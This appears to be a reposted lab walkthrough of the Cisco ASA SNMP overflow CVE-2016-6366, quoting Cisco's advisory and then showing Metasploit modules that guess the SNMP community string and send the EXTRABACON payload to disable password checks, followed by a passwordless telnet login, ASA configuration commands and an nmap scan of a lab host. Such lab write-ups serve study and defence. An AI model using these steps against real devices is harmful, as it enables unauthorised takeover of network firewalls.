Vuln - Cisco - CVE-2016-6366
来源:互联网 发布:监控矩阵键盘说明书 编辑:程序博客网 时间:2024/04/30 14:35
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160817-asa-snmp says
A vulnerability in the Simple Network Management Protocol (SNMP) code of Cisco Adaptive Security Appliance (ASA) Software could allow an authenticated, remote attacker to cause a reload of the affected system or to remotely execute code.
The vulnerability is due to a buffer overflow in the affected code area. The vulnerability affects all versions of SNMP (versions 1, 2c, and 3) when enabled on a virtual or physical Cisco ASA device. An attacker could exploit this vulnerability by sending crafted SNMP packets to an SNMP-enabled interface on the affected system. An exploit could allow the attacker to execute arbitrary code and obtain full control of the system or to cause a reload of the affected system. The attacker must know the SNMP community string to exploit this vulnerability.
Note: Only traffic directed to the affected system can be used to exploit this vulnerability. This vulnerability affects systems configured in routed and transparent firewall mode only and in single or multiple context mode. This vulnerability can be triggered by IPv4 traffic only. The attacker requires knowledge of the configured SNMP community string in SNMP version 1 and SNMP version 2c or a valid username and password for SNMP version 3.
Cisco has released software updates that address this vulnerability. Mitigations are listed in the Workarounds section of this advisory.
Exploit Cisco CVE-2016-6366
https://github.com/RiskSense-Ops/CVE-2016-6366/
msf auxiliary(snmp_login) > set PASSWORD publicPASSWORD => publicmsf auxiliary(snmp_login) > set RHOSTS 192.168.206.114RHOSTS => 192.168.206.114msf auxiliary(snmp_login) > run[+] 192.168.206.114:161 - LOGIN SUCCESSFUL: public (Access level: read-write); Proof (sysDescr.0): Cisco Adaptive Security Appliance Version 9.2(1)[*] Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completed
msf auxiliary(cisco_asa_extrabacon) > show optionsModule options (auxiliary/admin/cisco/cisco_asa_extrabacon): Name Current Setting Required Description ---- --------------- -------- ----------- COMMUNITY public yes SNMP Community String MODE pass-disable yes Enable or disable the password auth functions (Accepted: pass-disable, pass-enable) RETRIES 1 yes SNMP Retries RHOST 192.168.206.114 yes The target address RPORT 161 yes The target port TIMEOUT 1 yes SNMP Timeoutmsf auxiliary(cisco_asa_extrabacon) > run[*] Building pass-disable payload for version 9.2(1)...[*] Sending SNMP payload...[+] Clean return detected![!] Don't forget to run pass-enable after logging in![*] Auxiliary module execution completed
Please telnet the target host with no password.
$ telnet 192.168.206.114
Unprivileged Mode
ciscoasa> ? clear Reset functions enable Turn on privileged commands exit Exit from the EXEC help Interactive help for commands login Log in as a particular user logout Exit from the EXEC no Negate a command or set its defaults ping Send echo messages quit Exit from the EXEC show Show running system information traceroute Trace route to destination
Version
ciscoasa> show version Cisco Adaptive Security Appliance Software Version 9.2(1) Device Manager Version 7.2(1)Compiled on Thu 24-Apr-14 12:14 PDT by buildersSystem image file is "boot:/asa921-smp-k8.bin"Config file at boot was "startup-config"ciscoasa up 2 hours 25 minsHardware: ASAv, 2048 MB RAM, CPU Pentium II 2793 MHz,Internal ATA Compact Flash, 256MBSlot 1: ATA Compact Flash, 8192MBBIOS Flash Firmware Hub @ 0x1, 0KB 0: Ext: Management0/0 : address is 000c.29a9.88d6, irq 10 1: Ext: GigabitEthernet0/0 : address is 000c.29a9.88e0, irq 5 2: Ext: GigabitEthernet0/1 : address is 000c.29a9.88ea, irq 9 3: Ext: GigabitEthernet0/2 : address is 000c.29a9.88f4, irq 10ASAv Platform License State: Unlicensed*Install -587174176 vCPU ASAv platform license for full functionality.The Running Activation Key is not valid, using default settings:Licensed features for this platform:Virtual CPUs : 0 perpetualMaximum Physical Interfaces : 10 perpetualMaximum VLANs : 50 perpetualInside Hosts : Unlimited perpetualFailover : Active/Standby perpetualEncryption-DES : Enabled perpetualEncryption-3DES-AES : Enabled perpetualSecurity Contexts : 0 perpetualGTP/GPRS : Disabled perpetualAnyConnect Premium Peers : 2 perpetualAnyConnect Essentials : Disabled perpetualOther VPN Peers : 250 perpetualTotal VPN Peers : 250 perpetualShared License : Disabled perpetualAnyConnect for Mobile : Disabled perpetualAnyConnect for Cisco VPN Phone : Disabled perpetualAdvanced Endpoint Assessment : Disabled perpetualUC Phone Proxy Sessions : 2 perpetualTotal UC Proxy Sessions : 2 perpetualBotnet Traffic Filter : Enabled perpetualIntercompany Media Engine : Disabled perpetualCluster : Disabled perpetualThis platform has an ASAv VPN Premium license.Serial Number: 9ATJDXTHK3BRunning Permanent Activation Key: 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 Image type : ReleaseKey version : AConfiguration last modified by enable_15 at 10:12:25.439 UTC Mon Sep 26 2016
Privileged Mode
ciscoasa> help enable USAGE: enable [<priv_level>]DESCRIPTION:enable Turn on privileged commands
ciscoasa> enable ? <0-15> Enter optional privilege level (0-15) <cr>
ciscoasa> enablePassword: ciscoasa# configure terminalciscoasa(config)# ? aaa Enable, disable, or view user authentication, authorization and accounting aaa-server Configure a AAA server group or a AAA server access-group Bind an access-list to an interface to filter traffic access-list Configure an access control element arp Change or view ARP table, set ARP timeout value, view statistics as-path BGP autonomous system path filter asdm Configure Device Manager asp Configure ASP parameters auth-prompt Customize authentication challenge, reject or acceptance prompt auto-update Configure Auto Update banner Configure login/session banners bgp-community format for BGP community boot Set system boot parameters ca Certification authority call-home Smart Call-Home Configuration checkheaps Configure checkheap verification intervals class-map Configure MPF Class Map clear Clear client-update Configure and change client update parameters clock Configure time-of-day clock cluster Cluster configuration command-alias Create command alias community-list Add a community list entry compression Configure global Compression parameters configure Configure using various methods console Serial console functions coredump Configure Coredump options crashinfo Enable/Disable writing crashinfo to flash crypto Configure IPSec, ISAKMP, Certification authority, key ctl-file Configure a ctl-file instance ctl-provider Configure a CTL Provider instance cts Cisco Trusted Security commands ddns Configure dynamic DNS update method dhcp-client Configure parameters for DHCP client operation dhcpd Configure DHCP Server dhcprelay Configure DHCP Relay Agent dns Add DNS functionality to an interface dns-group Set the global DNS server group dns-guard Enforce one DNS response per query domain-name Change domain name dynamic-access-policy-record Dynamic Access Policy configuration commands dynamic-filter Configure Dynamic Filter dynamic-map Configure crypto dynamic map enable Configure password for the enable command end Exit from configure mode established Allow inbound connections based on established connections event Configure event manager exit Exit from config mode failover Enable/disable failover feature filter Enable or disable URL, FTP, HTTPS, Java, and ActiveX filtering fips FIPS 140-2 compliance information firewall Switch to router/transparent mode fixup Add or delete inspection services flow-export Configure flow information export through NetFlow fragment Configure the IP fragment database ftp Set FTP mode ftp-map Configure advanced options for FTP inspection group-delimiter The delimiter for tunnel-group lookup. group-policy Configure or remove a group policy gtp-map Configure advanced options for GTP inspection h225-map Configure advanced options for H225 inspection help Interactive help for commands hostname Change host name of the system hpm Configure TopN host statistics collection http Configure http server and https related commands http-map This command has been deprecated. icmp Configure access rules for ICMP traffic imap4s Configure the imap4s service interface Select an interface to configure ip Configure IP address pools ip Configure IP addresses, address pools, IDS, etc ipsec Configure transform-set, IPSec SA lifetime and PMTU Aging reset timer ipv6 Configure IPv6 address pools ipv6 Global IPv6 configuration commands ipv6-vpn-addr-assign Global settings for VPN IP address assignment policy isakmp Configure ISAKMP options jumbo-frame Configure jumbo-frame support key Create various configuration keys l2tp Configure Global L2TP Parameters ldap Configure LDAP Mapping logging Configure logging levels, recipients and other options logout Logoff from config mode mac-address MAC address options mac-list Create a mac-list to filter based on MAC address management-access Configure management access interface map Configure crypto map media-termination Configure a media-termination instance mgcp-map Configure advanced options for MGCP inspection migrate Migrate IKEv1 configuration to IKEv2/SSL monitor-interface Enable or disable failover monitoring on a specific interface mount Configure a system mount mroute Configure static multicast routes mtu Specify MTU(Maximum Transmission Unit) for an interface multicast-routing Enable IP multicast name Associate a name with an IP address names Enable/Disable IP address to name mapping nat Associate a network with a pool of global IP addresses no Negate a command or set its defaults ntp Configure NTP nve Configure an Network Virtulization Endpoint (NVE) object Configure an object object-group Create an object group for use in 'access-list', etc object-group-search Enables object group search algorithm pager Control page length for pagination passwd Change Telnet console access password password Configure password encryption password-policy Configure password policy options phone-proxy Configure a Phone proxy instance pim Configure Protocol Independent Multicast policy-list Define IP Policy list policy-map Configure MPF Parameter Map pop3s Configure the pop3s service prefix-list Build a prefix list priority-queue Enter sub-command mode to set priority-queue attributes privilege Configure privilege levels for commands prompt Configure session prompt display quit Exit from config mode quota Configure quotas regex Define a regular expression remote-access Configure SNMP trap threshold for VPN remote-access sessions route Configure a static route for an interface route-map Create route-map or enter route-map configuration mode router Enable a routing process same-security-traffic Enable same security level interfaces to communicate scansafe Scansafe configuration service Configure system services service-interface service-interface for dynamic interface types service-policy Configure MPF service policy setup Pre-configure the system sla IP Service Level Agreement smtp-server Configure default SMTP server address to be used for Email smtps Configure the smtps service snmp Configure the SNMP options snmp-map Configure an snmp-map, to control the operation of the SNMP inspection snmp-server Modify SNMP engine parameters ssh Configure SSH options ssl Configure SSL options sunrpc-server Create SUNRPC services table sysopt Set system functional options tcp-map Configure advanced options for TCP inspection telnet Add telnet access to system console or set idle timeout terminal Set terminal line parameters tftp-server Configure default TFTP server address and directory threat-detection Show threat detection information time-range Define time range entries timeout Configure maximum idle times tls-proxy Configure a TLS proxy instance or the maximum sessions track Object tracking configuration commands tunnel-group Create and manage the database of connection specific records for IPSec connections tunnel-group-map Specify policy by which the tunnel-group name is derived from the content of a certificate. uc-ime Configure a Cisco Intercompany Media Engine (UC-IME) instance url-block Enable URL pending block buffer and long URL support url-cache Enable/Disable URL caching url-server Configure a URL filtering server user-identity Configure user-identity firewall username Configure user authentication local database virtual Configure address for authentication virtual servers vnmc Configure VNMC params vpdn Configure VPDN feature vpn Configure VPN parameters. vpn-addr-assign Global settings for VPN IP address assignment policy vpn-sessiondb Configure the VPN Session Manager vpnsetup Configure VPN Setup Commands vxlan Configure VXLAN system parameters wccp Web-Cache Coordination Protocol Commands webvpn Configure the WebVPN service xlate Configure an xlate option zonelabs-integrity ZoneLabs integrity Firewall Server Configuration
Cisco Terminal
ciscoasa> enable Password: ciscoasa# configure ? terminal Configure using terminal/console ciscoasa# configure terminal ciscoasa(config)#
Cisco Interfaces
ciscoasa(config)# interface ?configure mode commands/options: GigabitEthernet GigabitEthernet IEEE 802.3z Management Management interface Redundant Redundant Interface TVI Tenant Virtual Interface vni VNI Interface <cr>
ciscoasa(config)# interface GigabitEthernet ?configure mode commands/options: <0-0> GigabitEthernet interface number
ciscoasa(config)# interface GigabitEthernet 0?configure mode commands/options: /
ciscoasa(config)# interface GigabitEthernet 0/?configure mode commands/options: <0-2> GigabitEthernet interface number
ciscoasa(config)# interface GigabitEthernet 0/0
Cisco Interfaces Config - set a ip address
ciscoasa(config-if)# ? Interface configuration commands: authentication authentication subcommands ddns Configure dynamic DNS default Set a command to its defaults delay Specify interface throughput delay description Interface specific description dhcp Configure parameters for DHCP client dhcprelay Configure DHCP Relay Agent duplex Configure duplex operation exit Exit from interface configuration mode flowcontrol Configure flowcontrol operation hello-interval Configures EIGRP-IPv4 hello interval help Interactive help for interface subcommands hold-time Configures EIGRP-IPv4 hold time igmp IGMP interface commands ip Configure the ip address ipv6 IPv6 interface subcommands mac-address Assign MAC address to interface management-only Dedicate an interface to management. Block thru traffic mfib Interface Specific MFIB Control multicast Configure multicast routing nameif Assign name to interface no Negate a command or set its defaults ospf OSPF interface commands pim PIM interface commands pppoe Configure parameters for PPPoE client rip Router Information Protocol security-level Specify the security level of this interface after this keyword, Eg: 0, 100 etc. The relative security level between two interfaces determines the way the Adaptive Security Algorithm is applied. A lower security_level interface is outside relative to a higher level interface and equivalent interfaces are outside to each other shutdown Shutdown the selected interface speed Configure speed operation split-horizon Configures EIGRP-IPv4 split-horizon summary-address Configures EIGRP-IPv4 summary-address
ciscoasa(config-if)# ip address ?interface mode commands/options: Hostname or A.B.C.D Firewall's network interface address dhcp Keyword to use DHCP to poll for information. Enables the DHCP client feature on the specified interface pppoe Keyword to use PPPoE to poll for information. Enables the PPPoE client feature on the specified interfaceciscoasa(config)# ip address 192.168.206.114 255.255.255.0ciscoasa(config-if)# no shutdownciscoasa(config-if)# exitciscoasa(config)# exit
ciscoasa# ping 192.168.206.1Type escape sequence to abort.Sending 5, 100-byte ICMP Echos to 192.168.206.1, timeout is 2 seconds:!!!!!Success rate is 100 percent (5/5), round-trip min/avg/max = 1/2/10 ms
Enable snmp
ciscoasa# configure terminalciscoasa(config)# snmp-server host inside 192.168.206.1 community 0 public
Enable ssh
ciscoasa# configure terminal ciscoasa(config)# username admin password passwordciscoasa(config)# aaa authentication ssh console LOCALciscoasa(config)# passwd passwordciscoasa(config)# crypto key generate rsa ? configure mode commands/options: general-keys Generate a general purpose RSA key pair for signing and encryption label Provide a label modulus Provide number of modulus bits on the command line noconfirm Specify this keyword to suppress all interactive prompting. usage-keys Generate seperate RSA key pairs for signing and encryption <cr>ciscoasa(config)# crypto key generate rsa modulus ?configure mode commands/options: 1024 1024 bits 2048 2048 bits 4096 4096 bits 512 512 bits 768 768 bitsciscoasa(config)# ssh 192.168.206.1 255.255.255.0 inside ciscoasa(config)# ssh 192.168.206.137 255.255.255.0 inside ciscoasa(config)# ssh version 2
Enable Telnet
ciscoasa# configure terminal ciscoasa(config)# aaa authentication telnet console LOCALciscoasa(config)# telnet 0.0.0.0 0.0.0.0 inside
Nmap scan
sec@gpg:~$ nmap -v -n -Pn -sV --open 192.168.206.114Starting Nmap 6.40 ( http://nmap.org ) at 2016-09-26 04:01 CDTNSE: Loaded 23 scripts for scanning.Initiating Connect Scan at 04:01Scanning 192.168.206.114 [1000 ports]Discovered open port 23/tcp on 192.168.206.114Discovered open port 22/tcp on 192.168.206.114Completed Connect Scan at 04:01, 4.83s elapsed (1000 total ports)Initiating Service scan at 04:01Scanning 2 services on 192.168.206.114Completed Service scan at 04:01, 0.00s elapsed (2 services on 1 host)NSE: Script scanning 192.168.206.114.Nmap scan report for 192.168.206.114Host is up (0.00040s latency).Not shown: 998 filtered portsPORT STATE SERVICE VERSION22/tcp open ssh Cisco SSH 1.25 (protocol 2.0)23/tcp open telnet Cisco ASA 5505 firewall telnetdService Info: OS: IOS; Device: firewall; CPE: cpe:/o:cisco:iosRead data files from: /usr/bin/../share/nmapService detection performed. Please report any incorrect results at http://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 4.96 seconds
References
https://github.com/RiskSense-Ops/CVE-2016-6366/
http://paper.seebug.org/31/
http://www.cisco.com/c/en/us/support/docs/security/asa-5500-x-series-next-generation-firewalls/118075-configure-asa-00.html
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160817-asa-snmp
- Vuln - Cisco - CVE-2016-6366
- Vuln - Cisco - CVE-2016-6415 - IKE Information Disclosure
- PHPMailer Exploit Remote Code Exec CVE-2016-10033 Vuln
- CISCO 零日漏洞 CVE-2016-6415,由NSA方程组泄露档案中探得
- CISCO 零日漏洞 CVE-2016-6415,由NSA方程组泄露档案中探得
- 再探CVE-2016-0728
- CVE-2016-4655 windknown
- cve -2016-8704
- CVE-2016-5195
- CVE
- OpenSSH客户端漏洞:CVE-2016-0777和CVE-2016-0778
- mysql CVE-2016-6662漏洞
- CVE-2016-1503 漏洞分析
- CVE-2017-5375&CVE-2017-5400&CVE-2016-9079浅析-firefox中的JIT喷射
- EXPLOITING CVE-2016-2060 ON QUALCOMM DEVICES
- pPOWERSHELL EMPIRE + CVE-2016-0189 = PROFIT
- tomcat 漏洞 CVE-2016-1240 分析报告
- POWERSHELL EMPIRE + CVE-2016-0189 = PROFIT
- Listen第二个参数的意义
- HttpSession详解
- 交换俩个数组的内容(数组大小一样)
- jdk环境配置及测试
- mybatis的学习探讨(上)
- Vuln - Cisco - CVE-2016-6366
- 利用百度地图采集大量某一区域经纬度信息
- uva10820(欧拉函数,排列组合)
- 微信小程序示会话管理应用场景例利用腾讯云仅限开发案例三
- 移动端获取屏幕宽度
- HTML5学习_day05(6)--html之布局中使用浮动带来的问题
- 微服务框架Spring Cloud介绍 Part1: 使用事件和消息队列实现分布式事务
- byte数组 和 16进制进制见的转换
- Grunt开发环境搭建